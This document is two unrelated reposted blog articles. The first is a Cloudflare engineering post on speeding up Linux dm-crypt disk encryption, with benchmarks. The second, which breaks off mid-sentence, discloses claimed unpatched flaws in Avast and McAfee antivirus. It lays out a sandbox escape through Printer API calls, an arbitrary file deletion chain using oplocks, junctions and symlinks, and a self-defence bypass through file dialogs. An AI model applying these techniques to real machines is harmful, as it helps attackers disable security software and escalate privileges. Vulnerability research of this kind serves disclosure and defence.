Speeding up Linux disk encryption

Speeding up Linux disk encryption

Original text by Ignat Korchagin

Data encryption at rest is a must-have for any modern Internet company. Many companies, however, don’t encrypt their disks, because they fear the potential performance penalty caused by encryption overhead.

Encrypting data at rest is vital for Cloudflare with more than 200 data centres across the world. In this post, we will investigate the performance of disk encryption on Linux and explain how we made it at least two times faster for ourselves and our customers!

Encrypting data at rest

When it comes to encrypting data at rest there are several ways it can be implemented on a modern operating system (OS). Available techniques are tightly coupled with a typical OS storage stack. A simplified version of the storage stack and encryption solutions can be found on the diagram below:

storage-stack

On the top of the stack are applications, which read and write data in files (or streams). The file system in the OS kernel keeps track of which blocks of the underlying block device belong to which files and translates these file reads and writes into block reads and writes, however the hardware specifics of the underlying storage device is abstracted away from the filesystem. Finally, the block subsystem actually passes the block reads and writes to the underlying hardware using appropriate device drivers.

The concept of the storage stack is actually similar to the well-known network OSI model, where each layer has a more high-level view of the information and the implementation details of the lower layers are abstracted away from the upper layers. And, similar to the OSI model, one can apply encryption at different layers (think about TLS vs IPsec or a VPN).

For data at rest we can apply encryption either at the block layers (either in hardware or in software) or at the file level (either directly in applications or in the filesystem).

Block vs file encryption

Generally, the higher in the stack we apply encryption, the more flexibility we have. With application level encryption the application maintainers can apply any encryption code they please to any particular data they need. The downside of this approach is they actually have to implement it themselves and encryption in general is not very developer-friendly: one has to know the ins and outs of a specific cryptographic algorithm, properly generate keys, nonces, IVs etc. Additionally, application level encryption does not leverage OS-level caching and Linux page cache in particular: each time the application needs to use the data, it has to either decrypt it again, wasting CPU cycles, or implement its own decrypted “cache”, which introduces more complexity to the code.

File system level encryption makes data encryption transparent to applications, because the file system itself encrypts the data before passing it to the block subsystem, so files are encrypted regardless if the application has crypto support or not. Also, file systems can be configured to encrypt only a particular directory or have different keys for different files. This flexibility, however, comes at a cost of a more complex configuration. File system encryption is also considered less secure than block device encryption as only the contents of the files are encrypted. Files also have associated metadata, like file size, the number of files, the directory tree layout etc., which are still visible to a potential adversary.

Encryption down at the block layer (often referred to as disk encryption or full disk encryption) also makes data encryption transparent to applications and even whole file systems. Unlike file system level encryption it encrypts all data on the disk including file metadata and even free space. It is less flexible though — one can only encrypt the whole disk with a single key, so there is no per-directory, per-file or per-user configuration. From the crypto perspective, not all cryptographic algorithms can be used as the block layer doesn’t have a high-level overview of the data anymore, so it needs to process each block independently. Most common algorithms require some sort of block chaining to be secure, so are not applicable to disk encryption. Instead, special modes were developed just for this specific use-case.

So which layer to choose? As always, it depends… Application and file system level encryption are usually the preferred choice for client systems because of the flexibility. For example, each user on a multi-user desktop may want to encrypt their home directory with a key they own and leave some shared directories unencrypted. On the contrary, on server systems, managed by SaaS/PaaS/IaaS companies (including Cloudflare) the preferred choice is configuration simplicity and security — with full disk encryption enabled any data from any application is automatically encrypted with no exceptions or overrides. We believe that all data needs to be protected without sorting it into «important» vs «not important» buckets, so the selective flexibility the upper layers provide is not needed.

Hardware vs software disk encryption

When encrypting data at the block layer it is possible to do it directly in the storage hardware, if the hardware supports it. Doing so usually gives better read/write performance and consumes less resources from the host. However, since most hardware firmware is proprietary, it does not receive as much attention and review from the security community. In the past this led to flaws in some implementations of hardware disk encryption, which render the whole security model useless. Microsoft, for example, started to prefer software-based disk encryption since then.

We didn’t want to put our data and our customers’ data to the risk of using potentially insecure solutions and we strongly believe in open-source. That’s why we rely only on software disk encryption in the Linux kernel, which is open and has been audited by many security professionals across the world.

Linux disk encryption performance

We aim not only to save bandwidth costs for our customers, but to deliver content to Internet users as fast as possible.

At one point we noticed that our disks were not as fast as we would like them to be. Some profiling as well as a quick A/B test pointed to Linux disk encryption. Because not encrypting the data (even if it is supposed-to-be a public Internet cache) is not a sustainable option, we decided to take a closer look into Linux disk encryption performance.

Device mapper and dm-crypt

Linux implements transparent disk encryption via a dm-crypt module and 

dm-crypt
 itself is part of device mapper kernel framework. In a nutshell, the device mapper allows pre/post-process IO requests as they travel between the file system and the underlying block device.

dm-crypt
 in particular encrypts «write» IO requests before sending them further down the stack to the actual block device and decrypts «read» IO requests before sending them up to the file system driver. Simple and easy! Or is it?

Benchmarking setup

For the record, the numbers in this post were obtained by running specified commands on an idle Cloudflare G9 server out of production. However, the setup should be easily reproducible on any modern x86 laptop.

Generally, benchmarking anything around a storage stack is hard because of the noise introduced by the storage hardware itself. Not all disks are created equal, so for the purpose of this post we will use the fastest disks available out there — that is no disks.

Instead Linux has an option to emulate a disk directly in RAM. Since RAM is much faster than any persistent storage, it should introduce little bias in our results.

The following command creates a 4GB ramdisk:


$ sudo modprobe brd rd_nr=1 rd_size=4194304
$ ls /dev/ram0

Now we can set up a 

dm-crypt
 instance on top of it thus enabling encryption for the disk. First, we need to generate the disk encryption key, «format» the disk and specify a password to unlock the newly generated key.


$ fallocate -l 2M crypthdr.img
$ sudo cryptsetup luksFormat /dev/ram0 --header crypthdr.img

WARNING!
========
This will overwrite data on crypthdr.img irrevocably.

Are you sure? (Type uppercase yes): YES
Enter passphrase:
Verify passphrase:

Those who are familiar with 

LUKS/dm-crypt
 might have noticed we used a LUKS detached header here. Normally, LUKS stores the password-encrypted disk encryption key on the same disk as the data, but since we want to compare read/write performance between encrypted and unencrypted devices, we might accidentally overwrite the encrypted key during our benchmarking later. Keeping the encrypted key in a separate file avoids this problem for the purposes of this post.

Now, we can actually «unlock» the encrypted device for our testing:


$ sudo cryptsetup open --header crypthdr.img /dev/ram0 encrypted-ram0
Enter passphrase for /dev/ram0:
$ ls /dev/mapper/encrypted-ram0
/dev/mapper/encrypted-ram0

At this point we can now compare the performance of encrypted vs unencrypted ramdisk: if we read/write data to 

/dev/ram0
, it will be stored in plaintext. Likewise, if we read/write data to 
/dev/mapper/encrypted-ram0
, it will be decrypted/encrypted on the way by 
dm-crypt
 and stored in ciphertext.

It’s worth noting that we’re not creating any file system on top of our block devices to avoid biasing results with a file system overhead.

Measuring throughput

When it comes to storage testing/benchmarking Flexible I/O tester is the usual go-to solution. Let’s simulate simple sequential read/write load with 4K block size on the ramdisk without encryption:


$ sudo fio --filename=/dev/ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=plain
plain: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=21013MB, aggrb=1126.5MB/s, minb=1126.5MB/s, maxb=1126.5MB/s, mint=18655msec, maxt=18655msec
  WRITE: io=21023MB, aggrb=1126.1MB/s, minb=1126.1MB/s, maxb=1126.1MB/s, mint=18655msec, maxt=18655msec

Disk stats (read/write):
  ram0: ios=0/0, merge=0/0, ticks=0/0, in_queue=0, util=0.00%

The above command will run for a long time, so we just stop it after a while. As we can see from the stats, we’re able to read and write roughly with the same throughput around 

1126 MB/s
. Let’s repeat the test with the encrypted ramdisk:


$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=1693.7MB, aggrb=150874KB/s, minb=150874KB/s, maxb=150874KB/s, mint=11491msec, maxt=11491msec
  WRITE: io=1696.4MB, aggrb=151170KB/s, minb=151170KB/s, maxb=151170KB/s, mint=11491msec, maxt=11491msec

Whoa, that’s a drop! We only get 

~147 MB/s
 now, which is more than 7 times slower! And this is on a totally idle machine!

Maybe, crypto is just slow

The first thing we considered is to ensure we use the fastest crypto. 

cryptsetup
 allows us to benchmark all the available crypto implementations on the system to select the best one:


$ sudo cryptsetup benchmark
# Tests are approximate using memory only (no storage IO).
PBKDF2-sha1      1340890 iterations per second for 256-bit key
PBKDF2-sha256    1539759 iterations per second for 256-bit key
PBKDF2-sha512    1205259 iterations per second for 256-bit key
PBKDF2-ripemd160  967321 iterations per second for 256-bit key
PBKDF2-whirlpool  720175 iterations per second for 256-bit key
#  Algorithm | Key |  Encryption |  Decryption
     aes-cbc   128b   969.7 MiB/s  3110.0 MiB/s
 serpent-cbc   128b           N/A           N/A
 twofish-cbc   128b           N/A           N/A
     aes-cbc   256b   756.1 MiB/s  2474.7 MiB/s
 serpent-cbc   256b           N/A           N/A
 twofish-cbc   256b           N/A           N/A
     aes-xts   256b  1823.1 MiB/s  1900.3 MiB/s
 serpent-xts   256b           N/A           N/A
 twofish-xts   256b           N/A           N/A
     aes-xts   512b  1724.4 MiB/s  1765.8 MiB/s
 serpent-xts   512b           N/A           N/A
 twofish-xts   512b           N/A           N/A

It seems 

aes-xts
 with a 256-bit data encryption key is the fastest here. But which one are we actually using for our encrypted ramdisk?


$ sudo dmsetup table /dev/mapper/encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0

We do use 

aes-xts
 with a 256-bit data encryption key (count all the zeroes conveniently masked by 
dmsetup
 tool — if you want to see the actual bytes, add the 
--showkeys
 option to the above command). The numbers do not add up however: 
cryptsetup benchmark
 tells us above not to rely on the results, as «Tests are approximate using memory only (no storage IO)», but that is exactly how we’ve set up our experiment using the ramdisk. In a somewhat worse case (assuming we’re reading all the data and then encrypting/decrypting it sequentially with no parallelism) doing back-of-the-envelope calculation we should be getting around 
(1126 * 1823) / (1126 + 1823) =~696 MB/s
, which is still quite far from the actual 
147 * 2 = 294 MB/s
 (total for reads and writes).

dm-crypt performance flags

While reading the cryptsetup man page we noticed that it has two options prefixed with 

--perf-
, which are probably related to performance tuning. The first one is 
--perf-same_cpu_crypt
 with a rather cryptic description:


Perform encryption using the same cpu that IO was submitted on.  The default is to use an unbound workqueue so that encryption work is automatically balanced between available CPUs.  This option is only relevant for open action.

So we enable the option


$ sudo cryptsetup close encrypted-ram0
$ sudo cryptsetup open --header crypthdr.img --perf-same_cpu_crypt /dev/ram0 encrypted-ram0

Note: according to the latest man page there is also a 

cryptsetup refresh
 command, which can be used to enable these options live without having to «close» and «re-open» the encrypted device. Our 
cryptsetup
 however didn’t support it yet.

Verifying if the option has been really enabled:


$ sudo dmsetup table encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0 1 same_cpu_crypt

Yes, we can now see 

same_cpu_crypt
 in the output, which is what we wanted. Let’s rerun the benchmark:


$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=1596.6MB, aggrb=139811KB/s, minb=139811KB/s, maxb=139811KB/s, mint=11693msec, maxt=11693msec
  WRITE: io=1600.9MB, aggrb=140192KB/s, minb=140192KB/s, maxb=140192KB/s, mint=11693msec, maxt=11693msec

Hmm, now it is 

~136 MB/s
 which is slightly worse than before, so no good. What about the second option 
--perf-submit_from_crypt_cpus
:


Disable offloading writes to a separate thread after encryption.  There are some situations where offloading write bios from the encryption threads to a single thread degrades performance significantly.  The default is to offload write bios to the same thread.  This option is only relevant for open action.

Maybe, we are in the «some situation» here, so let’s try it out:


$ sudo cryptsetup close encrypted-ram0
$ sudo cryptsetup open --header crypthdr.img --perf-submit_from_crypt_cpus /dev/ram0 encrypted-ram0
Enter passphrase for /dev/ram0:
$ sudo dmsetup table encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0 1 submit_from_crypt_cpus

And now the benchmark:


$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=2066.6MB, aggrb=169835KB/s, minb=169835KB/s, maxb=169835KB/s, mint=12457msec, maxt=12457msec
  WRITE: io=2067.7MB, aggrb=169965KB/s, minb=169965KB/s, maxb=169965KB/s, mint=12457msec, maxt=12457msec

~166 MB/s
, which is a bit better, but still not good…

Asking the community

Being desperate we decided to seek support from the Internet and posted our findings to the 

 mailing list, but the response we got was not very encouraging:

If the numbers disturb you, then this is from lack of understanding on your side. You are probably unaware that encryption is a heavy-weight operation…

We decided to make a scientific research on this topic by typing «is encryption expensive» into Google Search and one of the top results, which actually contains meaningful measurements, is… our own post about cost of encryption, but in the context of TLS! This is a fascinating read on its own, but the gist is: modern crypto on modern hardware is very cheap even at Cloudflare scale (doing millions of encrypted HTTP requests per second). In fact, it is so cheap that Cloudflare was the first provider to offer free SSL/TLS for everyone.

Digging into the source code

When trying to use the custom 

dm-crypt
 options described above we were curious why they exist in the first place and what is that «offloading» all about. Originally we expected 
dm-crypt
 to be a simple «proxy», which just encrypts/decrypts data as it flows through the stack. Turns out 
dm-crypt
 does more than just encrypting memory buffers and a (simplified) IO traverse path diagram is presented below:

dm-crypt

When the file system issues a write request, 

dm-crypt
 does not process it immediately — instead it puts it into a workqueue named «kcryptd». In a nutshell, a kernel workqueue just schedules some work (encryption in this case) to be performed at some later time, when it is more convenient. When «the time» comes, 
dm-crypt
 sends the request to Linux Crypto API for actual encryption. However, modern Linux Crypto API is asynchronous as well, so depending on which particular implementation your system will use, most likely it will not be processed immediately, but queued again for «later time». When Linux Crypto API will finally do the encryption
dm-crypt
 may try to sort pending write requests by putting each request into a red-black tree. Then a separate kernel thread again at «some time later» actually takes all IO requests in the tree and sends them down the stack.

Now for read requests: this time we need to get the encrypted data first from the hardware, but 

dm-crypt
 does not just ask for the driver for the data, but queues the request into a different workqueue named «kcryptd_io». At some point later, when we actually have the encrypted data, we schedule it for decryption using the now familiar «kcryptd» workqueue. «kcryptd» will send the request to Linux Crypto API, which may decrypt the data asynchronously as well.

To be fair the request does not always traverse all these queues, but the important part here is that write requests may be queued up to 4 times in 

dm-crypt
 and read requests up to 3 times. At this point we were wondering if all this extra queueing can cause any performance issues. For example, there is a nice presentation from Google about the relationship between queueing and tail latency. One key takeaway from the presentation is:

A significant amount of tail latency is due to queueing effects

So, why are all these queues there and can we remove them?

Git archeology

No-one writes more complex code just for fun, especially for the OS kernel. So all these queues must have been put there for a reason. Luckily, the Linux kernel source is managed by git, so we can try to retrace the changes and the decisions around them.

The «kcryptd» workqueue was in the source since the beginning of the available history with the following comment:

Needed because it would be very unwise to do decryption in an interrupt context, so bios returning from read requests get queued here.

So it was for reads only, but even then — why do we care if it is interrupt context or not, if Linux Crypto API will likely use a dedicated thread/queue for encryption anyway? Well, back in 2005 Crypto API was not asynchronous, so this made perfect sense.

In 2006 

dm-crypt
 started to use the «kcryptd» workqueue not only for encryption, but for submitting IO requests:

This patch is designed to help dm-crypt comply with the new constraints imposed by the following patch in -mm: md-dm-reduce-stack-usage-with-stacked-block-devices.patch

It seems the goal here was not to add more concurrency, but rather reduce kernel stack usage, which makes sense again as the kernel has a common stack across all the code, so it is a quite limited resource. It is worth noting, however, that the Linux kernel stack has been expanded in 2014 for x86 platforms, so this might not be a problem anymore.

first version of «kcryptd_io» workqueue was added in 2007 with the intent to avoid:

starvation caused by many requests waiting for memory allocation…

The request processing was bottlenecking on a single workqueue here, so the solution was to add another one. Makes sense.

We are definitely not the first ones experiencing performance degradation because of extensive queueing: in 2011 a change was introduced to conditionally revert some of the queueing for read requests:

If there is enough memory, code can directly submit bio instead queuing this operation in a separate thread.

Unfortunately, at that time Linux kernel commit messages were not as verbose as today, so there is no performance data available.

In 2015 dm-crypt started to sort writes in a separate «dmcrypt_write» thread before sending them down the stack:

On a multiprocessor machine, encryption requests finish in a different order than they were submitted. Consequently, write requests would be submitted in a different order and it could cause severe performance degradation.

It does make sense as sequential disk access used to be much faster than the random one and 

dm-crypt
 was breaking the pattern. But this mostly applies to spinning disks, which were still dominant in 2015. It may not be as important with modern fast SSDs (including NVME SSDs).

Another part of the commit message is worth mentioning:

…in particular it enables IO schedulers like CFQ to sort more effectively…

It mentions the performance benefits for the CFQ IO scheduler, but Linux schedulers have improved since then to the point that CFQ scheduler has been removed from the kernel in 2018.

The same patchset replaces the sorting list with a red-black tree:

In theory the sorting should be performed by the underlying disk scheduler, however, in practice the disk scheduler only accepts and sorts a finite number of requests. To allow the sorting of all requests, dm-crypt needs to implement its own sorting.

The overhead associated with rbtree-based sorting is considered negligible so it is not used conditionally.

All that make sense, but it would be nice to have some backing data.

Interestingly, in the same patchset we see the introduction of our familiar «submit_from_crypt_cpus» option:

There are some situations where offloading write bios from the encryption threads to a single thread degrades performance significantly

Overall, we can see that every change was reasonable and needed, however things have changed since then:

  • hardware became faster and smarter
  • Linux resource allocation was revisited
  • coupled Linux subsystems were rearchitected

And many of the design choices above may not be applicable to modern Linux.

The «clean-up»

Based on the research above we decided to try to remove all the extra queueing and asynchronous behaviour and revert 

dm-crypt
 to its original purpose: simply encrypt/decrypt IO requests as they pass through. But for the sake of stability and further benchmarking we ended up not removing the actual code, but rather adding yet another 
dm-crypt
 option, which bypasses all the queues/threads, if enabled. The flag allows us to switch between the current and new behaviour at runtime under full production load, so we can easily revert our changes should we see any side-effects. The resulting patch can be found on the Cloudflare GitHub Linux repository.

Synchronous Linux Crypto API

From the diagram above we remember that not all queueing is implemented in 

dm-crypt
. Modern Linux Crypto API may also be asynchronous and for the sake of this experiment we want to eliminate queues there as well. What does «may be» mean, though? The OS may contain different implementations of the same algorithm (for example, hardware-accelerated AES-NI on x86 platforms and generic C-code AES implementations). By default the system chooses the «best» one based on the configured algorithm priority
dm-crypt
 allows overriding this behaviour and request a particular cipher implementation using the 
capi:
 prefix. However, there is one problem. Let us actually check the available AES-XTS (this is our disk encryption cipher, remember?) implementations on our system:


$ grep -A 11 'xts(aes)' /proc/crypto
name         : xts(aes)
driver       : xts(ecb(aes-generic))
module       : kernel
priority     : 100
refcnt       : 7
selftest     : passed
internal     : no
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : __xts(aes)
driver       : cryptd(__xts-aes-aesni)
module       : cryptd
priority     : 451
refcnt       : 1
selftest     : passed
internal     : yes
type         : skcipher
async        : yes
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : xts(aes)
driver       : xts-aes-aesni
module       : aesni_intel
priority     : 401
refcnt       : 1
selftest     : passed
internal     : no
type         : skcipher
async        : yes
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : __xts(aes)
driver       : __xts-aes-aesni
module       : aesni_intel
priority     : 401
refcnt       : 7
selftest     : passed
internal     : yes
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64

We want to explicitly select a synchronous cipher from the above list to avoid queueing effects in threads, but the only two supported are 

xts(ecb(aes-generic))
 (the generic C implementation) and 
__xts-aes-aesni
 (the x86 hardware-accelerated implementation). We definitely want the latter as it is much faster (we’re aiming for performance here), but it is suspiciously marked as internal (see 
internal: yes
). If we check the source code:

Mark a cipher as a service implementation only usable by another cipher and never by a normal user of the kernel crypto API

So this cipher is meant to be used only by other wrapper code in the Crypto API and not outside it. In practice this means, that the caller of the Crypto API needs to explicitly specify this flag, when requesting a particular cipher implementation, but 

dm-crypt
 does not do it, because by design it is not part of the Linux Crypto API, rather an «external» user. We already patch the 
dm-crypt
 module, so we could as well just add the relevant flag. However, there is another problem with AES-NI in particular: x86 FPU. «Floating point» you say? Why do we need floating point math to do symmetric encryption which should only be about bit shifts and XOR operations? We don’t need the math, but AES-NI instructions use some of the CPU registers, which are dedicated to the FPU. Unfortunately the Linux kernel does not always preserve these registers in interrupt context for performance reasons (saving/restoring FPU is expensive). But 
dm-crypt
 may execute code in interrupt context, so we risk corrupting some other process data and we go back to «it would be very unwise to do decryption in an interrupt context» statement in the original code.

Our solution to address the above was to create another somewhat «smart» Crypto API module. This module is synchronous and does not roll its own crypto, but is just a «router» of encryption requests:

  • if we can use the FPU (and thus AES-NI) in the current execution context, we just forward the encryption request to the faster, «internal» 
    __xts-aes-aesni
     implementation (and we can use it here, because now we are part of the Crypto API)
  • otherwise, we just forward the encryption request to the slower, generic C-based 
    xts(ecb(aes-generic))
     implementation

Using the whole lot

Let’s walk through the process of using it all together. The first step is to grab the patches and recompile the kernel (or just compile 

dm-crypt
 and our 
xtsproxy
 modules).

Next, let’s restart our IO workload in a separate terminal, so we can make sure we can reconfigure the kernel at runtime under load:


$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...

In the main terminal make sure our new Crypto API module is loaded and available:


$ sudo modprobe xtsproxy
$ grep -A 11 'xtsproxy' /proc/crypto
driver       : xts-aes-xtsproxy
module       : xtsproxy
priority     : 0
refcnt       : 0
selftest     : passed
internal     : no
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64
ivsize       : 16
chunksize    : 16

Reconfigure the encrypted disk to use our newly loaded module and enable our patched 

dm-crypt
 flag (we have to use low-level 
dmsetup
 tool as 
cryptsetup
 obviously is not aware of our modifications):


$ sudo dmsetup table encrypted-ram0 --showkeys | sed 's/aes-xts-plain64/capi:xts-aes-xtsproxy-plain64/' | sed 's/$/ 1 force_inline/' | sudo dmsetup reload encrypted-ram0

We just «loaded» the new configuration, but for it to take effect, we need to suspend/resume the encrypted device:


$ sudo dmsetup suspend encrypted-ram0 && sudo dmsetup resume encrypted-ram0

And now observe the result. We may go back to the other terminal running the 

fio
 job and look at the output, but to make things nicer, here’s a snapshot of the observed read/write throughput in Grafana:

read-throughput-annotated
write-throughput-annotated

Wow, we have more than doubled the throughput! With the total throughput of 

~640 MB/s
 we’re now much closer to the expected 
~696 MB/s
 from above. What about the IO latency? (The 
await
 statistic from the iostat reporting tool):

await-annotated

The latency has been cut in half as well!

To production

So far we have been using a synthetic setup with some parts of the full production stack missing, like file systems, real hardware and most importantly, production workload. To ensure we’re not optimising imaginary things, here is a snapshot of the production impact these changes bring to the caching part of our stack:

prod

This graph represents a three-way comparison of the worst-case response times (99th percentile) for a cache hit in one of our servers. The green line is from a server with unencrypted disks, which we will use as baseline. The red line is from a server with encrypted disks with the default Linux disk encryption implementation and the blue line is from a server with encrypted disks and our optimisations enabled. As we can see the default Linux disk encryption implementation has a significant impact on our cache latency in worst case scenarios, whereas the patched implementation is indistinguishable from not using encryption at all. In other words the improved encryption implementation does not have any impact at all on our cache response speed, so we basically get it for free! That’s a win!

We’re just getting started

This post shows how an architecture review can double the performance of a system. Also we reconfirmed that modern cryptography is not expensive and there is usually no excuse not to protect your data.

We are going to submit this work for inclusion in the main kernel source tree, but most likely not in its current form. Although the results look encouraging we have to remember that Linux is a highly portable operating system: it runs on powerful servers as well as small resource constrained IoT devices and on many other CPU architectures as well. The current version of the patches just optimises disk encryption for a particular workload on a particular architecture, but Linux needs a solution which runs smoothly everywhere.

That said, if you think your case is similar and you want to take advantage of the performance improvements now, you may grab the patches and hopefully provide feedback. The runtime flag makes it easy to toggle the functionality on the fly and a simple A/B test may be performed to see if it benefits any particular case or setup. These patches have been running across our wide network of more than 200 data centres on five generations of hardware, so can be reasonably considered stable. Enjoy both performance and security from Cloudflare for all!

Oh, so you have an antivirus… name every bug

Oh, so you have an antivirus… name every bug

Original text by halove23

Oh, so you have an antivirus… name every bug

After my previous disclosure with Windows defender and Windows Setup, this is the next one

First of all, why ? it’s because I can, and because I need a job.

In this blog I will be disclosing about 8 0-day vulnerability and all of them are still unknow to the vendors, don’t expect those bugs to be working for more than a week or two cause probably they will release an emergency security patches to fix those bugs.

    Avast antivirus

a.   Sandbox Escape

So avast antivirus (any paid version) have a feature called Avast sandbox, this feature allow you to test suspicious file in sandbox. But this sandbox is completely different from any sandbox I know, let’s say windows sandboxed apps are running in a special container and also by applying some mitigation to their tokens (such as: lowering token integrity, applying the create process mitigation…) and other sandboxes actually run a suspicious file in a virtual machine instead so the file will stay completely isolated. But Avast sandbox is something completely different, the sandboxed app run in the OS and with few security mitigation to the sandboxed app token, such as removing some privileges like SeDebugPrivilege, SeShutdownPrivilege… while the token integrity stay the same, while this isn’t enough to make a sandbox. Avast sandbox actually create a virtualized file stream and registry hive almostly identical to the real one, while it also force the sandboxed app to use the virtualized stream by hooking every single WINAPI call ! This sounds cool but also sound impossible, any incomplete hooking could result in sandbox escape.

Btw, the virtualized file stream is located in “C:\avast! sandbox”

While the virtualized registry hive exist in “H****\__avast! Sandbox” and it look like there’s also a virtualized object manager in “\snx-av\”

So normally to make any escape I should read any available write-ups related to avast sandbox escape, and after some research it look like I found something: CVE-2016-4025 and another bug by google project zero.

Nettitude Labs covered a crafted DeviceIoControll call in order to escape from the virtualization, they noticed after using the “Save As” feature in notepad the actual saved file is outside the sandbox (in the real filesystem) and it look like it’s my way to get out

I selected their way by clicking on “Save As” and it don’t seems to be working because the patch has disabled the feature but instead of clicking on “Save As” I clicked in “Print”

By doing that it look like we got another pop-up so normally I clicked print with the default printer “Microsoft XPS Document Writer”

And yup we will have a “Save As” window after clicking on Print

So clicked on Save, I really didn’t expected anything to happen but guess what

The file was spawned outside the virtualized file stream. That’s clearly a sandbox escape.

How ? it seems look like an external process written the file while impersonating notepad’s access token. And luckily since CVE-2020-1337 I was focused on learning the Printer API by reading every single documentation provided by Microsoft, while in other side. James Forshaw published something related to a windows sandbox escape by using the Printer API here.

So I assume we can easily escape from the sandbox if we managed to call the Printer API correctly, so we will begin with OpenPrinter function

And of course we will specify in pPrinterName the default printer that exist on a standard windows installation “Microsoft XPS Document Writer”

Next we will go for StartDocPrinter function which allow us to prepare a document for printing and the third argument looks kinda important

So we will take a look in DOC_INFO_1 struct and there’s some good news

It look like the second member will allow us to specify the actual file name so yeah it’s probably our way out of Avast sandbox.

So what now, we can probably see the file outside the sandbox, but what about writing things to the file. After further research I found another function which work like WriteFile it’s WritePrinter

Then the final result will look like this

Note: The bug was reported to the vendor but they didn’t replied as usual

a.   Privilege Escalation

It was a bit hard to find a privilege escalation but after taking some time, here you go Avast, there’s a feature in Avast called “REPAIR APP” after clicking on it, it look like a new child process is being created by Avast Antivirus Engine called “Instup.exe”

Probably there’s something worthy to look there, after attempting to repair the app. In this case we will be using a tool called Process Monitor

And as usual we got something that worth our attention, the instup process look for some non existing directories C:\stage0 and c:\stage1

So what if they exist ?

I created the c:\stage0 directory with a subfile inside it and I took a look on how the instup.exe behave against it and I observed an unexpected behaviour, instead of just deleting or ignoring the file it actually create a hardlink to the file

we can exploit the issue but the issue is that the hardlink have a random name and guessing it at the time of the hardlink we can redirect the creation to an arbitrary location but unluckily the hardlink random name is incredible hard to guess, if we attempted who know how much time it will take so I prefer to not look there instead I started looking somewhere else

In the end of the process of hardlink creation, you can see that both of them has been marked for deletion, probably we can abuse the issue to achieve an arbitrary file deletion bug.

I’ve created an exploit for the issue, the exploit will create a file inside c:\stage0 and will continuously look for the hardlink. When the hardlink is created the poc OpLock it until instup attempt to delete it, then the poc will move the file away and set c:\stage0 into junction to “\RPC CONTROL\” which there we will create a symbolic link to redirect the file deletion to an arbitrary file

Note: This bug wasn’t reported to the vendor.

PoC can be found here

McAfee Total Security

a.   Privilege Escalation

I already found bugs on this AV before and got acknowledged by vendor

For CVE-2020-7279 and CVE-2020-7282

CVE-2020-7282 was for an arbitrary file deletion issue in McAfee total protection and CVE-2020-7279 was for self-defence bypass.

The McAfee total security was vulnerable to an arbitrary file deletion, by creating a junction from C:\ProgramData\McAfee\Update to an arbitrary location result in arbitrary file deletion, the security patch was done by enforcing how McAfee total security updater handle reparse point.

But the most important is C:\ProgramData\McAfee\Update is actually protected by the self defence driver, so even an administrator couldn’t create files in this directory. The bypass was done by open the directory for GENERIC_WRITE access and then creating a mount point to the target directory so as soon the updater start it will delete the target directory subcontent.

But now a lot has changed, the directory now has subcontent (previously it was empty by default), 

After doing some analysis on how they fixed the self defence bug. Instead of preventing the directory opening (as it was expected) with GENERIC_WRITE they blocked the following control codes FSCTL_SET_REPARSE_POINT and FSCTL_SET_REPARSE_POINT_EX from being called on a protected filesystem component, I expected FSCTL_SET_REPARSE_POINT_EX but no they did a smart move in this case, so if we didn’t bypass the self defence we don’t have any actual impact on the component.

So this is it, this is as far as I can go… or no ?

a.   Novel way to bypass the self defence

This method work for all antiviruses which the filesystem filter.

So how does the kernel filter work ?

The filesystem filter restrict the access to the antivirus owned objects, by intercepting the user mode file I/O request, if the request coming from an antivirus component it will be granted, if not it will return access denied.

You can read more about that here, I already wrote some of them but for some private usage so for the moment I can’t disclose them, but there’s a bunch of examples you can find by example: here

So as far as I know there’s 2 way to bypass the filter

1.     Do a special call so it will be conflicted by what the driver see

2.     Request access from a protected component

So the special way was patched in CVE-2020-7279, the option that remain is the second one. How can we do that ?

The majority of the AV’s GUI support file dialog to select something let’s take by example McAfee file shredder which open a file dialog in order to let you choose to pick something

While the file dialog is used to pick files it be weaponized against the AV, to better understand the we need to make an example code, so I had to look for the API provided by Microsoft to do that. Generically apps use either GetOpenFileNameW or IFileDialog interface and since GetOpenFileNameW seems to be a bit deprecated we will focusing in IFileDialog Interface.

So I created a sample code (it look horrible but still doing the job)

After running the code

It look like that the job is being done from the process not from an external process (such as explorer), so technically anything we do is considered to be done as the process.

Hold on, if the things are done by the process. Doesn’t that mean that we can create a folder in a protected location ? Yes we can

c.   Weaponizing the self-protection bypass

The CVE-2020-7282 patch was a simple check against reparse points, before managing to delete any directory.

There’s a simple check to be done, if FSCTL_GET_REPARSE_POINT control on a directory return anything except STATUS_NOT_A_REPARSE_POINT the target will removed else the updater will delete the subcontent as

“NT AUTHORITY\SYSTEM”

